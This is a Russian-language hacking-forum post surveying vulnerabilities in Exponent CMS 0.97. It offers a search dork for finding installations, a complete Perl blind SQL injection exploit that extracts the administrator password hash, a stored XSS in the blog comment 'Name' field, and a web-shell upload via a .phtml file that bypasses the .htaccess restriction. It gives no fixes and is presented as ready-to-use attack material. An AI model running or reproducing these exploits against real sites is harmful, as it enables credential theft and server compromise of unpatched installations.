[ Обзор уязвимостей Exponent CMS ]

[ Обзор уязвимостей Exponent CMS ]

10.07.2008, 16:59

ZAMUT

Members of Antichat - Level 5

Регистрация: 24.10.2007

Сообщений: 256

С нами: 9762146

Репутация: 1174

[ Обзор уязвимостей Exponent CMS ]

Exponent CMS

Site: http://exponentcms.org
Dork: "Provided by OIC Group Inc" id
Version: Latest -- 0.97

Код:

default prefix: exponent_
user table: user
auth columns:  username,password
Hash: md5($pass)

Remote SQL Injection:

Bulletin Board by OIC Group, Inc

Vuln code:

/view_thread.php

PHP код:


		
			
....

if (!defined("EXPONENT")) exit("");

$bb = null;

$post = null;

$post = $db->selectObject("bb_post","id=".$_GET['id']);

# Видим, второе поле учавствует в запросе ниже.

if ($post && $post->parent != 0) $post = $db->selectObject("bb_post","id=".$post->parent);

....

...

PHP код:


		
			
....

function selectObjects($table, $where = null,$orderby = null) {

        if ($where == null) $where = "1";

        if ($orderby == null) $orderby = '';

        else $orderby = "ORDER BY " . $orderby;



        $res = @mysqli_query($this->connection, "SELECT * FROM `" . $this->prefix . "$table` WHERE $where $orderby");

        if ($res == null) return array();

        $objects = array();

        for ($i = 0; $i < mysqli_num_rows($res); $i++) $objects[] = mysqli_fetch_object($res);

        return $objects;

    }

....

Составив эксплоит с вложенным во второе поле запросом, все же, вывода я не нашел. Забираем данные посимвольно.
Exploit:

Код:

#!/usr/bin/perl
use strict;
use LWP::Simple;

&usage;

my $host = shift;
my $id = shift;
$|=1;
my $n=48;
my $i =1;
my $loop = 1;
my ($content,$result) = undef;
my $request = 0;
print "Administrator hash: ";
while($loop)
{
	$content = get($host.'/bbmodule/view_thread/id/'.$id.'+and+if(ascii(upper(substring((select+password+from+exponent_user+where+id=1),'.$i.',1)))='.$n.',1,0)');
	if($content =~ /Posted on/) {print $result=chr($n); $n=47; $i++;}
	elsif($i==33) {$loop = 0}
	else {$n++; if($n==58){$n=65} }
	$request++;
}

print "\nREQUEST: ".$request;

sub usage
{
    print q
    {
    #################################################################
             Exponent Bulletin Board Blind SQL Injection Exploit (id)   
                
			  Author: ZAMUT
			  Vuln: id=
			  Homepage: http://antichat.ru

    Usage: expon.pl [Server] [Valid Id]
    Example:
    perl expon.pl http://bla.ru 2 
    #################################################################
    };

}

Active XSS:

Module Weblog / Online Journal

При оставлении комментария уязвимо поле "Name"
Vuln code:

/comment_save.php

PHP код:


		
			
if (isset($comment->id)) {

        $comment->editor = $user->id;

        $comment->edited = time();

        $db->updateObject($comment,'weblog_comment');

    } else {

        $comment->posted = time();

      

              if (isset($user) && $user->id != 0) {

            $comment->poster = $user->id;

                $comment->name = $user->username;

              } elseif (isset($_POST['name'])) {

                $comment->name = $_POST['name'];

              } else {

                $comment->name = 'Anonymous';

              }



        $comment->parent_id = intval($_POST['parent_id']);

        $db->insertObject($comment,'weblog_comment');

    }

...

/postgres.php

PHP код:


		
			
function insertObject($object,$table) {

        $sql = "INSERT INTO " . $this->prefix.$table . " (";

        $values = ") VALUES (";

        foreach (get_object_vars($object) as $var=>$val) {

            $sql .= "$var,";

            $values .= "'".str_replace("'","\\'",$val)."',";

        }

        if (pg_query($this->connection,substr($sql,0,-1).substr($values,0,-1) . ")") !== false) {

            $sql = "SELECT last_value FROM " . $this->prefix.$table ."_id_seq";

            $res = @pg_query($this->connection,$sql);

            if ($res) {

                $o = pg_fetch_object($res);

                pg_free_result($res);

                return $o->last_value;

            } else return 0;

        } else return 0;

    }

Shell:

Manage Files => Upload => shell.phtml

Код:

http://localhost/exp/files/shell.phtml

В /files лежит .htaccess:

Код:

# secure directory by disabling script execution
AddHandler cgi-script .php .pl .py .jsp .asp .htm .shtml .sh .cgi
Options -ExecCGI

Download

P.S.
Уязвимые модули, идут c CMS по дефолту.

(c) ZAMUT

𝕏 Twitter Reddit Telegram Копировать ссылку

__________________
в строю